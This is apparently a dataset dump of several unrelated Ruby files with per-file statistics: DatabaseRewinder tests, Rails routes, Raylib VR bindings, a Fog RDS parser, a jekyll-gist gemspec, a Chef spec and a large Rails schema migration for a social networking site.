DatabaseRewinder[:active_record, connection: 'test']
DatabaseRewinder[:active_record, connection: 'test2']
Foo.create! name: 'foo1'
Quu.create! name: 'quu1'
DatabaseRewinder.clean
# it should clean all configured databases
assert_equal 0, Foo.count
assert_equal 0, Quu.count
end
end
sub_test_case '.record_inserted_table' do
def perform_insert(sql)
DatabaseRewinder.database_configuration = {'foo' => {'adapter' => 'sqlite3', 'database' => 'test_record_inserted_table.sqlite3'}}
@cleaner = DatabaseRewinder.create_cleaner 'foo'
connection = ::ActiveRecord::Base.sqlite3_connection(adapter: "sqlite3", database: File.expand_path('test_record_inserted_table.sqlite3', Rails.root))
DatabaseRewinder.record_inserted_table(connection, sql)
end
teardown do
DatabaseRewinder.database_configuration = nil
end
sub_test_case 'common database' do
test 'include database name' do
perform_insert 'INSERT INTO "database"."foos" ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
test 'only table name' do
perform_insert 'INSERT INTO "foos" ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
test 'without "INTO"' do
perform_insert 'INSERT "foos" ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
end
sub_test_case 'Database accepts more than one dots in an object notation (e.g. SQLServer)' do
test 'full joined' do
perform_insert 'INSERT INTO server.database.schema.foos ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
test 'missing one' do
perform_insert 'INSERT INTO database..foos ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
test 'missing two' do
perform_insert 'INSERT INTO server...foos ("name") VALUES (?)'
assert_equal ['foos'], @cleaner.inserted_tables
end
end
test 'when database accepts INSERT IGNORE INTO statement' do
perform_insert "INSERT IGNORE INTO `foos` (`name`) VALUES ('alice'), ('bob') ON DUPLICATE KEY UPDATE `foos`.`updated_at`=VALUES(`updated_at`)"
assert_equal ['foos'], @cleaner.inserted_tables
end
end
test '.clean' do
Foo.create! name: 'foo1'
Bar.create! name: 'bar1'
DatabaseRewinder.clean
assert_equal 0, Foo.count
assert_equal 0, Bar.count
end
if ActiveRecord::VERSION::STRING >= '4'
test '.clean_all should not touch AR::SchemaMigration' do
begin
ActiveRecord::SchemaMigration.create_table
ActiveRecord::SchemaMigration.create! version: '001'
Foo.create! name: 'foo1'
DatabaseRewinder.clean_all
assert_equal 0, Foo.count
assert_equal 1, ActiveRecord::SchemaMigration.count
ensure
ActiveRecord::SchemaMigration.drop_table
end
end
end
sub_test_case '.clean_with' do
def perform_clean(options)
@cleaner = DatabaseRewinder.cleaners.first
@only = @cleaner.instance_variable_get(:@only)
@except = @cleaner.instance_variable_get(:@except)
Foo.create! name: 'foo1'
Bar.create! name: 'bar1'
DatabaseRewinder.clean_with :truncation, options
end
test 'with only option' do
perform_clean only: ['foos']
assert_equal 0, Foo.count
assert_equal 1, Bar.count
assert_equal @only, @cleaner.instance_variable_get(:@only)
end
test 'with except option' do
perform_clean except: ['bars']
assert_equal 0, Foo.count
assert_equal 1, Bar.count
assert_equal @except, @cleaner.instance_variable_get(:@except)
end
end
sub_test_case '.cleaning' do
test 'without exception' do
DatabaseRewinder.cleaning do
Foo.create! name: 'foo1'
end
assert_equal 0, Foo.count
end
test 'with exception' do
assert_raises do
DatabaseRewinder.cleaning do
Foo.create! name: 'foo1'; fail
end
end
assert_equal 0, Foo.count
end
end
sub_test_case '.strategy=' do
sub_test_case 'call first with options' do
setup do
DatabaseRewinder.strategy = :truncate, { only: ['foos'], except: ['bars'] }
end
test 'should set options' do
assert_equal ['foos'], DatabaseRewinder.instance_variable_get(:@only)
assert_equal ['bars'], DatabaseRewinder.instance_variable_get(:@except)
end
test 'should create cleaner with options' do
cleaner = DatabaseRewinder.instance_variable_get(:@cleaners).first
assert_equal ['foos'], cleaner.instance_variable_get(:@only)
assert_equal ['bars'], cleaner.instance_variable_get(:@except)
end
sub_test_case 'call again with different options' do
setup do
DatabaseRewinder.strategy = :truncate, { only: ['bazs'], except: [] }
end
test 'should overwrite options' do
assert_equal ['bazs'], DatabaseRewinder.instance_variable_get(:@only)
assert_equal [], DatabaseRewinder.instance_variable_get(:@except)
end
test 'should overwrite cleaner with new options' do
cleaner = DatabaseRewinder.instance_variable_get(:@cleaners).first
assert_equal ['bazs'], cleaner.instance_variable_get(:@only)
assert_equal [], cleaner.instance_variable_get(:@except)
end
end
end
end
end
| 34.079208 | 156 | 0.665601 |
79e33a89242b41f11eb861681bfe12abba1f06c9
| 94 |
Rails.application.routes.draw do
namespace 'feedbook' do
resources :employees
end
end
| 15.666667 | 32 | 0.755319 |
ac2ba365c5ac9be0a527583353cb623c7686d690
| 1,541 |
module Raylib
class VR
extend FFIAttach
#------------------------------------------------------------------------------------
# Shaders System Functions (Module: rlgl)
# NOTE: This functions are useless when using OpenGL 1.1
#------------------------------------------------------------------------------------
# VR control functions
ray_static :InitVrSimulator, :init, [], :void # Init VR simulator for selected device parameters
ray_static :CloseVrSimulator, :close, [], :void # Close VR simulator for current device
ray_static :UpdateVrTracking, :tracking=, [Camera.ptr], :void # Update VR tracking (position and orientation) and camera
ray_static :SetVrConfiguration, :config=, [VrDeviceInfo.by_value, Shader.by_value], :void # Set stereo rendering configuration parameters
ray_static :IsVrSimulatorReady, :ready?, [], :bool # Detect if VR simulator is ready
ray_static :ToggleVrMode, :toggle, [], :void # Enable/Disable VR experience
ray_static :BeginVrDrawing, :begin_drawing, [], :void # Begin VR simulator stereo rendering
ray_static :EndVrDrawing, :end_drawing, [], :void # End VR simulator stereo rendering
end
end
| 73.380952 | 162 | 0.480857 |
1dcbeaaa322469d39581831dfaedd8660bdc5fd0
| 895 |
module Fog
module Parsers
module AWS
module RDS
require 'fog/aws/parsers/rds/security_group_parser'
class AuthorizeDBSecurityGroupIngress < Fog::Parsers::AWS::RDS::SecurityGroupParser
def reset
@response = { 'AuthorizeDBSecurityGroupIngressResult' => {}, 'ResponseMetadata' => {} }
super
end
def start_element(name, attrs = [])
super
end
def end_element(name)
case name
when 'DBSecurityGroup' then
@response['AuthorizeDBSecurityGroupIngressResult']['DBSecurityGroup'] = @security_group
@security_group = fresh_security_group
when 'RequestId'
@response['ResponseMetadata'][name] = @value
else
super
end
end
end
end
end
end
end
| 22.948718 | 101 | 0.556425 |
085ce3e7b707cd41427e9d07f73de8f4a3f7402e
| 1,950 |
# -*- encoding: utf-8 -*-
# stub: jekyll-gist 1.4.1 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-gist".freeze
s.version = "1.4.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Parker Moore".freeze]
s.date = "2017-06-21"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/jekyll/jekyll-gist".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 1.9.3".freeze)
s.rubygems_version = "2.7.6".freeze
s.summary = "Liquid tag for displaying GitHub Gists in Jekyll sites.".freeze
s.installed_by_version = "2.7.6" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<octokit>.freeze, ["~> 4.2"])
s.add_development_dependency(%q<bundler>.freeze, ["~> 1.6"])
s.add_development_dependency(%q<rake>.freeze, [">= 0"])
s.add_development_dependency(%q<rspec>.freeze, [">= 0"])
s.add_development_dependency(%q<webmock>.freeze, [">= 0"])
s.add_development_dependency(%q<jekyll>.freeze, [">= 2.0"])
else
s.add_dependency(%q<octokit>.freeze, ["~> 4.2"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.6"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<rspec>.freeze, [">= 0"])
s.add_dependency(%q<webmock>.freeze, [">= 0"])
s.add_dependency(%q<jekyll>.freeze, [">= 2.0"])
end
else
s.add_dependency(%q<octokit>.freeze, ["~> 4.2"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.6"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<rspec>.freeze, [">= 0"])
s.add_dependency(%q<webmock>.freeze, [">= 0"])
s.add_dependency(%q<jekyll>.freeze, [">= 2.0"])
end
end
| 40.625 | 112 | 0.638462 |
3362b68c629602b389ff6e79bc8213d903601b09
| 1,204 |
#
# Author:: Adam Jacob (<[email protected]>)
# Copyright:: Copyright (c) 2008 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
describe Chef::Resource::Python do
before(:each) do
@resource = Chef::Resource::Python.new("fakey_fakerton")
end
it "should create a new Chef::Resource::Python" do
@resource.should be_a_kind_of(Chef::Resource)
@resource.should be_a_kind_of(Chef::Resource::Python)
end
it "should have a resource name of :python" do
@resource.resource_name.should eql(:python)
end
it "should have an interpreter of python" do
@resource.interpreter.should eql("python")
end
end
| 29.365854 | 74 | 0.733389 |
9171f6ca343b16fd520c74b4f1e10972f28720cd
| 132 |
require 'test_helper'
class BlogBoi::Test < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, BlogBoi
end
end
| 16.5 | 45 | 0.75 |
4a79ba7eb9e026165d9b026561b28626755cdc20
| 19,932 |
class CreateLuvfoo < ActiveRecord::Migration
def self.up
create_table "bag_properties", :force => true do |t|
t.integer "bag_id", :default => 1
t.string "name"
t.string "label"
t.integer "data_type", :default => 1
t.string "display_type", :default => "text"
t.boolean "required", :default => false
t.string "default_value"
t.integer "default_visibility", :default => 4
t.boolean "can_change_visibility", :default => true
t.integer "sort", :default => 9999
t.integer "width", :default => -1
t.integer "height", :default => -1
t.integer "registration_page"
t.string "sf_field"
t.boolean "is_link", :default => false
t.string "prefix"
t.integer "maxlength", :default => 5000
end
create_table "bag_property_enums", :force => true do |t|
t.integer "bag_property_id"
t.string "name"
t.string "value"
t.integer "sort"
end
add_index "bag_property_enums", ["bag_property_id"], :name => "index_bag_property_enums_on_bag_property_id"
create_table "bag_property_values", :force => true do |t|
t.integer "data_type", :default => 1
t.integer "user_id"
t.integer "bag_property_id"
t.string "svalue"
t.text "tvalue", :limit => 16777215
t.integer "ivalue"
t.integer "bag_property_enum_id"
t.datetime "tsvalue"
t.integer "visibility"
end
add_index "bag_property_values", ["user_id", "bag_property_id"], :name => "index_bag_property_values_on_user_id_and_bag_property_id"
create_table "blogs", :force => true do |t|
t.string "title"
t.text "body"
t.integer "user_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "blogs", ["user_id"], :name => "index_blogs_on_user_id"
create_table "comments", :force => true do |t|
t.text "comment"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.integer "user_id"
t.string "commentable_type", :default => "", :null => false
t.integer "commentable_id", :null => false
t.integer "is_denied", :default => 0, :null => false
t.boolean "is_reviewed", :default => false
end
add_index "comments", ["user_id"], :name => "index_comments_on_user_id"
add_index "comments", ["commentable_id", "commentable_type"], :name => "index_comments_on_commentable_id_and_commentable_type"
create_table "content_page_versions", :force => true do |t|
t.integer "content_page_id"
t.integer "version"
t.integer "creator_id"
t.string "title"
t.string "url_key"
t.text "body"
t.string "locale"
t.datetime "updated_at"
t.text "body_raw"
t.integer "contentable_id"
t.string "contentable_type"
t.integer "parent_id", :default => 0
end
create_table "content_pages", :force => true do |t|
t.integer "creator_id"
t.string "title"
t.string "url_key"
t.text "body"
t.string "locale"
t.datetime "created_at"
t.datetime "updated_at"
t.text "body_raw"
t.integer "contentable_id"
t.string "contentable_type"
t.integer "parent_id", :default => 0, :null => false
t.integer "version"
end
add_index "content_pages", ["parent_id"], :name => "index_content_pages_on_parent_id"
create_table "countries", :force => true do |t|
t.string "name", :limit => 128, :default => "", :null => false
t.string "abbreviation", :limit => 3, :default => "", :null => false
end
create_table "entries", :force => true do |t|
t.string "permalink", :limit => 2083
t.string "title"
t.text "body"
t.datetime "published_at"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "user_id"
t.boolean "google_doc", :default => false
t.boolean "displayable", :default => false
end
create_table "feed_items", :force => true do |t|
t.boolean "include_comments", :default => false, :null => false
t.boolean "is_public", :default => false, :null => false
t.integer "item_id"
t.string "item_type"
t.integer "creator_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "feed_items", ["item_id", "item_type"], :name => "index_feed_items_on_item_id_and_item_type"
create_table "feeds", :force => true do |t|
t.integer "ownable_id"
t.integer "feed_item_id"
t.string "ownable_type"
end
add_index "feeds", ["ownable_id", "feed_item_id"], :name => "index_feeds_on_user_id_and_feed_item_id"
create_table "forums", :force => true do |t|
t.string "name"
t.text "description"
t.integer "position"
t.datetime "created_at"
t.datetime "updated_at"
t.string "forumable_type"
t.integer "forumable_id"
t.string "url_key"
end
add_index "forums", ["url_key"], :name => "index_forums_on_url_key"
create_table "friends", :force => true do |t|
t.integer "inviter_id"
t.integer "invited_id"
t.integer "status", :default => 0
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "friends", ["inviter_id", "invited_id"], :name => "index_friends_on_inviter_id_and_invited_id", :unique => true
add_index "friends", ["invited_id", "inviter_id"], :name => "index_friends_on_invited_id_and_inviter_id", :unique => true
create_table "grade_level_experiences", :force => true do |t|
t.string "name"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "grade_level_experiences_users", :id => false, :force => true do |t|
t.integer "user_id"
t.integer "grade_level_experience_id"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "groups", :force => true do |t|
t.integer "creator_id"
t.string "name"
t.text "description"
t.string "icon"
t.string "state"
t.string "url_key"
t.datetime "created_at"
t.datetime "updated_at"
t.string "default_role", :default => "member"
t.integer "visibility", :default => 2
t.boolean "requires_approval_to_join", :default => false
end
add_index "groups", ["url_key"], :name => "index_groups_on_url_key"
add_index "groups", ["creator_id"], :name => "index_groups_on_creator_id"
create_table "interests", :force => true do |t|
t.string "name"
end
create_table "interests_users", :id => false, :force => true do |t|
t.integer "user_id"
t.integer "interest_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "interests_users", ["user_id", "interest_id"], :name => "index_interests_users_on_user_id_and_interest_id"
add_index "interests_users", ["user_id"], :name => "index_interests_users_on_user_id"
create_table "languages", :force => true do |t|
t.string "name"
t.string "english_name"
t.integer "is_default", :default => 0
end
create_table "languages_users", :id => false, :force => true do |t|
t.integer "user_id"
t.integer "language_id"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "logos", :force => true do |t|
t.integer "site_id"
t.integer "parent_id"
t.integer "user_id"
t.integer "size"
t.integer "width"
t.integer "height"
t.string "content_type"
t.string "filename"
t.string "thumbnail"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "logos", ["site_id"], :name => "index_logos_on_site_id"
add_index "logos", ["parent_id"], :name => "index_logos_on_parent_id"
add_index "logos", ["user_id"], :name => "index_logos_on_user_id"
add_index "logos", ["content_type"], :name => "index_logos_on_content_type"
create_table "membership_requests", :force => true do |t|
t.integer "group_id"
t.integer "user_id"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "memberships", :force => true do |t|
t.integer "group_id"
t.integer "user_id"
t.boolean "banned", :default => false
t.string "role", :default => "--- :member\n"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "messages", :force => true do |t|
t.string "subject"
t.text "body"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "sender_id"
t.integer "receiver_id"
t.boolean "read", :default => false, :null => false
end
add_index "messages", ["sender_id"], :name => "index_messages_on_sender_id"
add_index "messages", ["receiver_id"], :name => "index_messages_on_receiver_id"
create_table "news_items", :force => true do |t|
t.string "title"
t.text "body"
t.integer "newsable_id"
t.string "newsable_type"
t.datetime "created_at"
t.datetime "updated_at"
t.string "url_key"
t.string "icon"
t.integer "creator_id"
end
add_index "news_items", ["url_key"], :name => "index_news_items_on_url_key"
create_table "open_id_authentication_associations", :force => true do |t|
t.integer "issued"
t.integer "lifetime"
t.string "handle"
t.string "assoc_type"
t.binary "server_url"
t.binary "secret"
end
create_table "open_id_authentication_nonces", :force => true do |t|
t.integer "timestamp", :null => false
t.string "server_url"
t.string "salt", :null => false
end
create_table "permissions", :force => true do |t|
t.integer "role_id", :null => false
t.integer "user_id", :null => false
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "photos", :force => true do |t|
t.string "caption", :limit => 1000
t.datetime "created_at"
t.datetime "updated_at"
t.integer "photoable_id"
t.string "image"
t.string "photoable_type"
end
add_index "photos", ["photoable_id"], :name => "index_photos_on_user_id"
create_table "plone_group_roles", :force => true do |t|
t.string "login"
t.string "rolename"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "plone_open_roles", :force => true do |t|
t.string "login"
t.string "rolename"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "professional_roles", :force => true do |t|
t.string "name"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "roles", :force => true do |t|
t.string "rolename"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "sessions", :force => true do |t|
t.string "session_id"
t.text "data"
t.datetime "updated_at"
end
add_index "sessions", ["session_id"], :name => "index_sessions_on_session_id"
add_index "sessions", ["updated_at"], :name => "index_sessions_on_updated_at"
create_table "shared_entries", :force => true do |t|
t.integer "shared_by_id"
t.integer "entry_id"
t.string "destination_type", :default => "", :null => false
t.integer "destination_id", :null => false
t.datetime "created_at"
t.boolean "can_edit", :default => false
t.boolean "public", :default => false
end
create_table "shared_pages", :force => true do |t|
t.integer "content_page_id"
t.string "share_type", :default => "", :null => false
t.integer "share_id", :null => false
t.integer "status", :default => 0
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "shared_uploads", :force => true do |t|
t.integer "shared_uploadable_id"
t.string "shared_uploadable_type"
t.integer "upload_id"
t.integer "shared_by_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "shared_uploads", ["shared_uploadable_id"], :name => "index_shared_uploads_on_uploadable_id"
add_index "shared_uploads", ["upload_id"], :name => "index_shared_uploads_on_upload_id"
add_index "shared_uploads", ["shared_by_id"], :name => "index_shared_uploads_on_shared_by_id"
create_table "sites", :force => true do |t|
t.string "name"
t.datetime "created_at"
t.datetime "updated_at"
t.string "title", :default => "", :null => false
t.string "subtitle", :default => "", :null => false
t.string "slogan", :default => "", :null => false
t.string "background_color", :default => "", :null => false
t.string "font_color", :default => "", :null => false
t.string "font_style", :default => "", :null => false
t.string "font_size", :default => "", :null => false
t.string "content_background_color", :default => "", :null => false
t.string "a_font_style", :default => "", :null => false
t.string "a_font_color", :default => "", :null => false
t.string "top_background_color", :default => "", :null => false
t.string "top_color", :default => "", :null => false
end
create_table "states", :force => true do |t|
t.string "name", :limit => 128, :default => "", :null => false
t.string "abbreviation", :limit => 3, :default => "", :null => false
t.integer "country_id", :limit => 8, :null => false
end
add_index "states", ["country_id"], :name => "country_id"
create_table "taggings", :force => true do |t|
t.integer "tag_id"
t.integer "taggable_id"
t.integer "tagger_id"
t.string "tagger_type"
t.string "taggable_type"
t.string "context"
t.datetime "created_at"
end
add_index "taggings", ["tag_id"], :name => "index_taggings_on_tag_id"
add_index "taggings", ["taggable_id", "taggable_type", "context"], :name => "index_taggings_on_taggable_id_and_taggable_type_and_context"
create_table "tags", :force => true do |t|
t.string "name"
end
create_table "uploads", :force => true do |t|
t.integer "parent_id"
t.integer "user_id"
t.string "content_type"
t.string "name"
t.string "caption", :limit => 1000
t.text "description"
t.string "filename"
t.string "thumbnail"
t.integer "size"
t.integer "width"
t.integer "height"
t.datetime "created_at"
t.datetime "updated_at"
t.boolean "is_public", :default => true
t.integer "uploadable_id"
t.string "uploadable_type"
end
add_index "uploads", ["parent_id"], :name => "index_uploads_on_parent_id"
add_index "uploads", ["user_id"], :name => "index_uploads_on_user_id"
add_index "uploads", ["content_type"], :name => "index_uploads_on_content_type"
create_table "users", :force => true do |t|
t.string "login"
t.string "email"
t.string "crypted_password", :limit => 40
t.string "salt", :limit => 40
t.string "remember_token"
t.datetime "remember_token_expires_at"
t.string "activation_code", :limit => 40
t.datetime "activated_at"
t.string "password_reset_code", :limit => 40
t.boolean "enabled", :default => true
t.boolean "terms_of_service", :default => false, :null => false
t.boolean "can_send_messages", :default => true
t.string "time_zone", :default => "UTC"
t.string "first_name"
t.string "last_name"
t.string "website"
t.string "blog"
t.string "flickr"
t.text "about_me"
t.string "aim_name"
t.string "gtalk_name"
t.string "ichat_name"
t.string "icon"
t.string "location"
t.datetime "created_at"
t.datetime "updated_at"
t.boolean "is_active", :default => false
t.string "youtube_username"
t.string "flickr_username"
t.string "identity_url"
t.string "city"
t.integer "state_id"
t.string "zip"
t.integer "country_id"
t.string "phone"
t.string "phone2"
t.string "msn"
t.string "skype"
t.string "yahoo"
t.string "organization"
t.integer "grade_experience"
t.integer "language_id"
t.text "why_joined"
t.text "skills"
t.text "occupation"
t.string "plone_password", :limit => 40
t.string "tmp_password", :limit => 40
t.integer "professional_role_id"
t.string "blog_rss"
t.text "protected_profile"
t.text "public_profile"
end
add_index "users", ["login"], :name => "index_users_on_login"
create_table "users_languages", :force => true do |t|
t.integer "user_id"
t.integer "language_id"
end
add_index "users_languages", ["user_id", "language_id"], :name => "index_users_languages_on_user_id_and_language_id"
add_index "users_languages", ["user_id"], :name => "index_users_languages_on_user_id"
create_table "widgets", :force => true do |t|
t.string "name"
t.datetime "created_at"
t.datetime "updated_at"
end
end
def self.down
drop_table 'bag_properties'
drop_table 'bag_property_enums'
drop_table 'bag_property_values'
drop_table 'blogs'
drop_table 'comments'
drop_table 'content_page_versions'
drop_table 'content_pages'
drop_table 'countries'
drop_table 'entries'
drop_table 'feed_items'
drop_table 'feeds'
drop_table 'forum_posts'
drop_table 'forum_topics'
drop_table 'forums'
drop_table 'friends'
drop_table 'grade_level_experiences'
drop_table 'grade_level_experiences_users'
drop_table 'groups'
drop_table 'interests'
drop_table 'interests_users'
drop_table 'languages'
drop_table 'languages_users'
drop_table 'logos'
drop_table 'membership_requests'
drop_table 'memberships'
drop_table 'messages'
drop_table 'news_items'
drop_table 'open_id_authentication_associations'
drop_table 'open_id_authentication_nonces'
drop_table 'permissions'
drop_table 'photos'
drop_table 'plone_group_roles'
drop_table 'plone_open_roles'
drop_table 'professional_roles'
drop_table 'roles'
drop_table 'schema_migrations'
drop_table 'sessions'
drop_table 'shared_entries'
drop_table 'shared_pages'
drop_table 'shared_uploads'
drop_table 'sites'
drop_table 'states'
drop_table 'taggings'
drop_table 'tags'
drop_table 'uploads'
drop_table 'users'
drop_table 'users_languages'
drop_table 'widgets'
end
end
| 34.724739 | 141 | 0.59116 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.